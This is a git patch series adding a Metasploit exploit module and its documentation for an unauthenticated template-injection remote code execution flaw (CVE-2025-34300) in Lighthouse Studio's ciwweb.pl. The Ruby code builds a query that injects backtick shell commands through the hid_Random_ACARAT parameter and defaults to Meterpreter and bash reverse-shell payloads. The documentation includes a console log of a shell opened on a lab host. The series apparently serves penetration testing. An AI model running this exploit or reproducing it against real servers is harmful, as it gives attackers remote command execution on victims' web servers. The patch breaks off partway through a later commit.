From e7667d406ad6ac9d103b4ff35a4df6014eb4b333 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Sun, 20 Jul 2025 15:23:38 +0400 Subject: [PATCH 01/18] Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300) --- ...thouse_studio_unauth_rce_CVE_2025_34300.md | 382 ++++++++++++++++++ ...thouse_studio_unauth_rce_cve_2025_34300.rb | 178 ++++++++ 2 files changed, 560 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md create mode 100644 modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md new file mode 100644 index 0000000000000..ff40e8dfa2c54 --- /dev/null +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -0,0 +1,382 @@ +## Vulnerable Application + +This module exploits a template injection vulnerability in the +Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application. +The application fails to properly sanitize user input within survey templates, +allowing unauthenticated attackers to inject and execute arbitrary Perl commands +on the target system. + +This vulnerability affects Lighthouse Studio versions prior to 9.16.14. +Successful exploitation may result in remote code execution under the privileges +of the web server, potentially exposing sensitive data or disrupting survey operations. + +An attacker can execute arbitrary system commands as the web server. + +## STUDYNAME parameter + +The `STUDYNAME` parameter must be set manually if the server responds with the error `Cannot find default studyname`, which occurs when the `hid_studyname` parameter is not provided. +The `hid_studyname` parameter serves as the identifier of the survey or test being executed. + +## Testing + +To set up a test environment: + +1. Download and Install Ubuntu 18.04.6 LTS + +Download the ISO from the official Ubuntu archive: +https://releases.ubuntu.com/18.04/ + +2. Update Package Index + +After installation, update your system’s package list: + +``` +sudo apt update +``` + +3. Install MySQL 5.7 + +Install MySQL 5.7, the target version: + +``` +sudo apt -y install mysql-server-5.7 +``` + +Once installed, MySQL should start automatically. If not, run: + +``` +sudo systemctl start mysql +``` + +4. Install Perl Modules + +Install core build tools and the cpanm Perl module manager: + +``` +sudo apt -y install build-essential cpanminus +``` + +Install required Perl modules with specific versions: + +``` +sudo cpanm DBI@1.642 +sudo cpanm DBD::mysql@4.050 +sudo cpanm JSON::PP@4.00 +sudo cpanm DateTime@1.06 +``` + +``` +sudo apt install libdbd-mysql-perl +``` + +5. Install and Start Apache Web Server + +``` +sudo apt install -y apache2 +sudo systemctl start apache2 +sudo systemctl enable apache2 +``` + +Apache will now be running and set to start automatically on boot. + +6. Enable CGI and Perl Support in Apache + +Install the required Apache modules and enable CGI execution: + +``` +sudo apt install -y libapache2-mod-perl2 +sudo a2enmod perl +sudo a2enmod cgi +sudo systemctl restart apache2 +``` + +This allows Perl CGI scripts to be executed from the web server. + +7. Install and Start FTP Server (vsftpd) + +``` +sudo apt install -y vsftpd +sudo systemctl start vsftpd +sudo systemctl enable vsftpd +``` + +8. Configure FTP Access + +Create FTP User + +``` +sudo adduser ftpuser +``` + +Set Directory Permissions + +``` +sudo chown -R ftpuser:ftpuser /var/www/html +``` + +Edit FTP Configuration. +Open the config file: + +``` +sudo nano /etc/vsftpd.conf +``` + +Update or add the following settings: + +``` +listen=YES +listen_ipv6=NO + +anonymous_enable=NO +local_enable=YES +write_enable=YES + +chroot_local_user=YES +allow_writeable_chroot=YES + +user_sub_token=$USER +local_root=/var/www/html + +local_umask=022 +file_open_mode=0644 +``` + +Then restart the FTP service: + +``` +sudo systemctl restart vsftpd +sudo systemctl enable vsftpd +``` + +9. Configure MySQL Access + +Create a Test User and Database + +Login to MySQL: + +``` +sudo mysql -u root +``` + +Then execute: + +``` +CREATE USER 'test'@'%' IDENTIFIED BY 'test'; +CREATE DATABASE test DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; +GRANT ALL PRIVILEGES ON test.* TO 'test'@'%'; +FLUSH PRIVILEGES; +EXIT; +``` + +Allow External MySQL Connections + +Edit the MySQL config: + +``` +sudo nano /etc/mysql/mysql.conf.d/mysqld.cnf +` + +Find the line: + +``` +bind-address = 127.0.0.1 +``` + +Change it to: + +``` +bind-address = 0.0.0.0 +``` + +Save and exit, then allow MySQL traffic through the firewall: + +``` +sudo ufw allow 3306/tcp +``` + +Restart MySQL: + +``` +sudo systemctl restart mysql +``` + +10. Configure Apache for CGI Scripts + +Update Apache Virtual Host + +Edit the default site config: + +``` +sudo nano /etc/apache2/sites-enabled/000-default.conf +``` + +Inside the `` block, add: + +``` +ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/ + + + AllowOverride None + Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch + Require all granted + +``` + +Restart Apache + +``` +sudo systemctl restart apache2 +``` + +Now CGI scripts in /var/www/html/cgi-bin/ should be executable. + +11. Download and Install Windows (on Second VM) + +Download Windows 10 ISO from the official Microsoft site: +https://www.microsoft.com/en-us/software-download/windows10 + +Follow standard installation steps in your hypervisor (e.g., VirtualBox, VMware, etc.). + +12. Download and Install Vulnerable Lighthouse Studio + +This is the vulnerable application used to build and upload surveys. + +https://d2rpjb6zne1wug.cloudfront.net/software-installers/Lighthouse-Studio/LighthouseStudio_9_16_12_Setup.exe + +The version history page is available at: +https://sawtoothsoftware.com/resources/software-downloads/lighthouse-studio/version-history + +Install Lighthouse Studio using default options. + +13. Create and Save a New Study + +Use + +``` +File -> New Study +``` + +and follow instructions. +In the end save the study. + +14. Upload the Study to the Ubuntu VM + +To host your survey on the Ubuntu VM: + +In the Top Bar -> Click on Hosting + +Set the following database configuration: + +Database Name: `test` + +Database Username: `test` + +Database Password: `test` + +Database Server: `MySQL` + +Set FTP Access + +Fill in the FTP settings: + +FTP Host: `IP address or hostname of your Ubuntu VM` + +Username: `ftpuser` + +Password: password for `ftpuser` + +In the "Advanced" Tab + +Set the Database Server Host Name — enter the IP address of your Ubuntu VM. + +15. Upload the Survey to Server + +Click the "Upload Survey to Server" button. + +If all configurations are correct, Lighthouse Studio will: + +- Upload the survey files via FTP +- Initialize the MySQL database +- Generate CGI scripts + +## Scenario + +``` +msf6 > use exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300 +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > show options + +Module options (exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + STUDYNAME no Value for the hid_studyname GET parameter + TARGETURI /cgi-bin/ciwweb.pl yes Path to vulnerable ciwweb.pl + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + + + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 8080 yes The local port to listen on. + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Linux Dropper + + + +View the full module info with the info, or info -d command. + +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set RHOSTS 192.168.19.129 +RHOSTS => 192.168.19.129 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set STUDYNAME 123 +STUDYNAME => 123 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set LHOST eth0 +LHOST => 192.168.19.130 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > set SRVPORT 9999 +SRVPORT => 9999 +msf6 exploit(multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300) > run + +[*] Started reverse TCP handler on 192.168.19.130:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Extracting version... +[*] Extracted version: 9.16.12 +[+] The target appears to be vulnerable. +[*] Uploading malicious payload... +[*] Command Stager progress - 44.31% done (362/817 bytes) +[*] Uploading malicious payload... +[*] Sending stage (3045380 bytes) to 192.168.19.129 +[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.129:39790) at 2025-07-20 07:04:31 -0400 +[*] Command Stager progress - 97.31% done (795/817 bytes) +[*] Uploading malicious payload... +[*] Command Stager progress - 100.00% done (817/817 bytes) + +meterpreter > sysinfo +Computer : 192.168.19.129 +OS : Ubuntu 18.04 (Linux 5.4.0-150-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > + +``` \ No newline at end of file diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb new file mode 100644 index 0000000000000..2d74af65c2301 --- /dev/null +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -0,0 +1,178 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)", + 'Description' => %q{ + This module exploits a template injection vulnerability in the + Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application. + The application fails to properly sanitize user input within survey templates, + allowing unauthenticated attackers to inject and execute arbitrary Perl commands + on the target system. + + This vulnerability affects Lighthouse Studio versions prior to 9.16.14. + Successful exploitation may result in remote code execution under the privileges + of the web server, potentially exposing sensitive data or disrupting survey operations. + + An attacker can execute arbitrary system commands as the web server. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Maksim Rogov', # Metasploit Module + 'Adam Kues' # Vulnerability Discovery + ], + 'References' => [ + ['CVE', 'CVE-2025-34300'], + ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/'] + ], + 'Platform' => ['win', 'linux', 'unix'], + 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Targets' => [ + [ + 'Linux Dropper', + { + 'Platform' => ['linux'], + 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Type' => :nix_dropper, + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } + } + ], + [ + 'Linux Command', + { + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD], + 'Type' => :nix_command, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } + } + ], + [ + 'Windows Dropper', + { + 'Platform' => 'win', + 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Type' => :windows_dropper, + 'DefaultOptions' => { + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + } + } + ], + [ + 'Windows Command', + { + 'Platform' => 'win', + 'Arch' => [ARCH_CMD], + 'Type' => :windows_command, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' + } + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2025-07-16', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [REPEATABLE_SESSION] + } + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), + OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']) + ] + ) + end + + def check + print_status('Extracting version...') + + vars = { + 'hid_javascript' => '1' + } + vars['hid_studyname'] = datastore['STUDYNAME'] if datastore['STUDYNAME'] + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'vars_get' => vars + ) + + unless res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ + print_error("#{peer} - Unable to extract version number") + end + + version_match = Regexp.last_match(1).to_s + if !version_match.empty? + print_status("Extracted version: #{version_match.gsub('_', '.')}") + + version = Rex::Version.new(version_match.gsub('_', '')) + if version < Rex::Version.new(91614) + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + html = res.get_html_document if res + if html.text.include?('Lighthouse Studio') + return CheckCode::Detected + end + + CheckCode::Unknown + end + + def execute_command(cmd, _opts = {}) + print_status('Uploading malicious payload...') + + cmd = Rex::Text.uri_encode(cmd, 'hex-all') + query = [ + 'hid_javascript=1', + "hid_Random_ACARAT=[%`#{cmd}`%]", + "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}" + ].join('&') + + if datastore['STUDYNAME'] + query << "&hid_studyname=#{datastore['STUDYNAME']}" + end + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'query' => query + }) + + if res + html = res.get_html_document + if html && html.text.include?('Sawtooth Error # 129') + return fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + end + end + end + + def exploit + @linemax = 450 + + case target['Type'] + when :windows_dropper, :nix_dropper + execute_cmdstager(linemax: @linemax) + when :windows_command, :nix_command + execute_command(payload.encoded, linemax: @linemax) + end + end +end From 75e1158457f05e041932615816d17343122f5ed0 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 03:16:40 +0400 Subject: [PATCH 02/18] Fixed docs formatting --- .../multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index ff40e8dfa2c54..10d7f1b23250a 100644 --- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -174,7 +174,7 @@ Edit the MySQL config: ``` sudo nano /etc/mysql/mysql.conf.d/mysqld.cnf -` +``` Find the line: From a836c9bc5e6d0df2e86cd08396a1fe82c941a983 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 03:17:57 +0400 Subject: [PATCH 03/18] Fixed CVE Format --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 2d74af65c2301..477fb31f22b8e 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -34,7 +34,7 @@ def initialize(info = {}) 'Adam Kues' # Vulnerability Discovery ], 'References' => [ - ['CVE', 'CVE-2025-34300'], + ['CVE', '2025-34300'], ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/'] ], 'Platform' => ['win', 'linux', 'unix'], From 6bf385e17aa850675384c6ffe8398cf3eb70ecef Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 03:20:34 +0400 Subject: [PATCH 04/18] Removed dublicate logging bug --- .../http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 477fb31f22b8e..3afc447c78c78 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -138,8 +138,6 @@ def check end def execute_command(cmd, _opts = {}) - print_status('Uploading malicious payload...') - cmd = Rex::Text.uri_encode(cmd, 'hex-all') query = [ 'hid_javascript=1', @@ -166,8 +164,9 @@ def execute_command(cmd, _opts = {}) end def exploit - @linemax = 450 + print_status('Uploading malicious payload...') + @linemax = 450 case target['Type'] when :windows_dropper, :nix_dropper execute_cmdstager(linemax: @linemax) From 45a6176a9cc8dcc6987a70e97935f82a0a3a8bac Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 11:03:24 +0400 Subject: [PATCH 05/18] Removed Limits --- .../http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 3afc447c78c78..7df7f2e6de258 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -166,12 +166,11 @@ def execute_command(cmd, _opts = {}) def exploit print_status('Uploading malicious payload...') - @linemax = 450 case target['Type'] when :windows_dropper, :nix_dropper - execute_cmdstager(linemax: @linemax) + execute_cmdstager when :windows_command, :nix_command - execute_command(payload.encoded, linemax: @linemax) + execute_command(payload.encoded) end end end From c06a7c477bf58da7107c82d561a254f1fb6a1a3d Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 13:06:51 +0400 Subject: [PATCH 06/18] Check Method Refactoring --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 25 ++++++++----------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 7df7f2e6de258..f626cb00ca467 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -112,29 +112,24 @@ def check 'method' => 'GET', 'vars_get' => vars ) + return CheckCode::Unknown('No response from target') unless res - unless res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ - print_error("#{peer} - Unable to extract version number") - end - - version_match = Regexp.last_match(1).to_s - if !version_match.empty? + if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ + version_match = Regexp.last_match(1).to_s print_status("Extracted version: #{version_match.gsub('_', '.')}") - version = Rex::Version.new(version_match.gsub('_', '')) - if version < Rex::Version.new(91614) - return CheckCode::Appears - else - return CheckCode::Safe - end + + return CheckCode::Appears if version < Rex::Version.new(91614) + else + print_error("#{peer} - Unable to extract version number") end - html = res.get_html_document if res - if html.text.include?('Lighthouse Studio') + html = res.get_html_document + if html&.text&.include?('Lighthouse Studio') return CheckCode::Detected end - CheckCode::Unknown + CheckCode::Safe end def execute_command(cmd, _opts = {}) From e90396a15fadfa05182a7f7c858aab84d6afc8be Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 13:59:43 +0400 Subject: [PATCH 07/18] Execute Method Refactoring --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index f626cb00ca467..730fdf6884383 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -134,27 +134,27 @@ def check def execute_command(cmd, _opts = {}) cmd = Rex::Text.uri_encode(cmd, 'hex-all') + query = [ 'hid_javascript=1', "hid_Random_ACARAT=[%`#{cmd}`%]", "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}" - ].join('&') + ] - if datastore['STUDYNAME'] - query << "&hid_studyname=#{datastore['STUDYNAME']}" - end + query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].to_s.strip.empty? + query_string = query.join('&') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', - 'query' => query + 'query' => query_string }) - if res - html = res.get_html_document - if html && html.text.include?('Sawtooth Error # 129') - return fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') - end + fail_with(Failure::Unreachable, 'No response from target') unless res + + html = res.get_html_document + if html&.text&.include?('Sawtooth Error # 129') + fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') end end From 85e97aaaf59b320852aa1f4522a58a6916a83dc8 Mon Sep 17 00:00:00 2001 From: Maksim Rogov <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 13:14:19 +0300 Subject: [PATCH 08/18] Fix STUDYNAME empty check --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 730fdf6884383..4d4a2b2d6206e 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -105,7 +105,7 @@ def check vars = { 'hid_javascript' => '1' } - vars['hid_studyname'] = datastore['STUDYNAME'] if datastore['STUDYNAME'] + vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].to_s.strip.empty? res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), From 6276b27dfca4bf86f41a876f74755f412b477f37 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:34:01 +0400 Subject: [PATCH 09/18] Improved Exploit Stability on Windows --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 25 +++++++++++-------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 4d4a2b2d6206e..2404780117444 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -94,7 +94,7 @@ def initialize(info = {}) register_options( [ OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), - OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']) + OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']), ] ) end @@ -105,7 +105,7 @@ def check vars = { 'hid_javascript' => '1' } - vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].to_s.strip.empty? + vars['hid_studyname'] = datastore['STUDYNAME'] unless datastore['STUDYNAME'].strip.empty? res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), @@ -133,7 +133,7 @@ def check end def execute_command(cmd, _opts = {}) - cmd = Rex::Text.uri_encode(cmd, 'hex-all') + cmd = Rex::Text.uri_encode(cmd).gsub('\\', '%5C').gsub('/', '%2F') query = [ 'hid_javascript=1', @@ -141,8 +141,9 @@ def execute_command(cmd, _opts = {}) "hid_Random_ACARAT=#{Rex::Text.rand_text_alphanumeric(rand(3..5))}" ] - query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].to_s.strip.empty? + query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].strip.empty? query_string = query.join('&') + print_status(query_string) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), @@ -150,11 +151,11 @@ def execute_command(cmd, _opts = {}) 'query' => query_string }) - fail_with(Failure::Unreachable, 'No response from target') unless res - - html = res.get_html_document - if html&.text&.include?('Sawtooth Error # 129') - fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + if res + html = res.get_html_document + if html&.text&.include?('Cannot find default studyname') + fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + end end end @@ -162,10 +163,12 @@ def exploit print_status('Uploading malicious payload...') case target['Type'] - when :windows_dropper, :nix_dropper + when :windows_dropper + execute_cmdstager(temp: '.') + when :nix_dropper execute_cmdstager when :windows_command, :nix_command execute_command(payload.encoded) end end -end +end \ No newline at end of file From d57a36413d8c9d3f61aed75668a70f0fac7d2e1f Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:34:41 +0400 Subject: [PATCH 10/18] Fix Tests --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 2404780117444..941a93491e216 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -171,4 +171,4 @@ def exploit execute_command(payload.encoded) end end -end \ No newline at end of file +end From 1c1b574b8111256fdca47f6c71b44a22376d039d Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:37:52 +0400 Subject: [PATCH 11/18] Removed Debug Print --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 941a93491e216..82abd48594c1a 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -143,7 +143,6 @@ def execute_command(cmd, _opts = {}) query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].strip.empty? query_string = query.join('&') - print_status(query_string) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), From d62ef448f17aef0dc4554666a4dc2d80ceedac70 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Tue, 22 Jul 2025 04:40:14 +0400 Subject: [PATCH 12/18] Code Review Edits --- .../lighthouse_studio_unauth_rce_cve_2025_34300.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 82abd48594c1a..7b096b9dd99da 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -37,8 +37,8 @@ def initialize(info = {}) ['CVE', '2025-34300'], ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/'] ], - 'Platform' => ['win', 'linux', 'unix'], - 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Platform' => ['multi'], + 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'Linux Dropper', @@ -116,10 +116,10 @@ def check if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ version_match = Regexp.last_match(1).to_s - print_status("Extracted version: #{version_match.gsub('_', '.')}") - version = Rex::Version.new(version_match.gsub('_', '')) + version = Rex::Version.new(version_match.gsub('_', '.')) + print_status("Extracted version: #{version}") - return CheckCode::Appears if version < Rex::Version.new(91614) + return CheckCode::Appears if version < Rex::Version.new('9.16.14') else print_error("#{peer} - Unable to extract version number") end From e93755adc6b7ce70e59fb6b4c4a07efe9e8231bc Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Wed, 23 Jul 2025 11:59:48 +0400 Subject: [PATCH 13/18] Added WritableDir Option --- .../http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 7b096b9dd99da..789978e3c255d 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb 